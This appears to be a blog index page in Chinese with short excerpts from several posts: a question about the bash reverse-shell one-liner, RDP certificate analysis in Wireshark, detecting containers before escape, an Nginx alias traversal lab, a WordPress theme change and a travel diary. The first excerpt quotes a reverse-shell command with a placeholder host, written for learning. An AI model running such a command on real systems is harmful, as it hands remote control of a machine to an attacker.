今天在学习反弹 shell，遇到一个经典的构造：

1

/bin/bash -i &> /dev/tcp/host/port 0>&1

对语句最后的 0>&1 我百思不得其解，为什么标准输入重定向到标准输出，攻击端输入的指定就到本机来了呢？标准输入指的是本机键盘输入吗？键盘输入重定向到屏幕不应该就是默认的吗？这里有什么作用？

本文记录一次使用 Wireshark 分析 RDP 证书的过程，这次遇到的证书比较特殊，是服务器专有证书（Server Proprietary Certificate），不能直接使用 X.509 格式的方式查看，当时为了分析这个证书花了不少时间。

想研究的课题是容器的渗透，一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器，通过何种手段开源判断此环境是否在容器之中。

漏洞介绍

Nginx在配置alias的时候，如果location最后不是以斜杠结尾，而alias以斜杠结尾，那么将出现目录穿越漏洞。

通过实验了解漏洞

实验靶场用的是《从0到1：CTFer成长之路》第一章第三节任意文件读取漏洞的第2个实验靶场。

GeneratePress主题快要过期了，虽然去年用这个主题做出了挺满意的效果，但无奈价格实在不便宜，所以今年不续费了。

由于选择困难症，自己开发主题的想法又迟迟没有进展，最后决定用官方提供的2024主题算了，然后自己在此基础上二次修改。也是个不错的想法，2024年就用2024主题，2025年就用2025主题，每年都有新面貌。

10 月 4 号

照例是先醒的人出去找吃的，在大众点评上挑了个最近的早餐店，距离只有几百米。原以为就近选择就是一家普通的店铺，没想到竟是一家网红店。

由于人太多，店内座位不够，店家直接把隔壁废弃的华为店面给征用了。点餐需要挤进店里自己拿，然后端到隔壁去吃。人实在太多，店家都顾不上收钱。其实食物也谈不上多美味，整体体验实在不佳。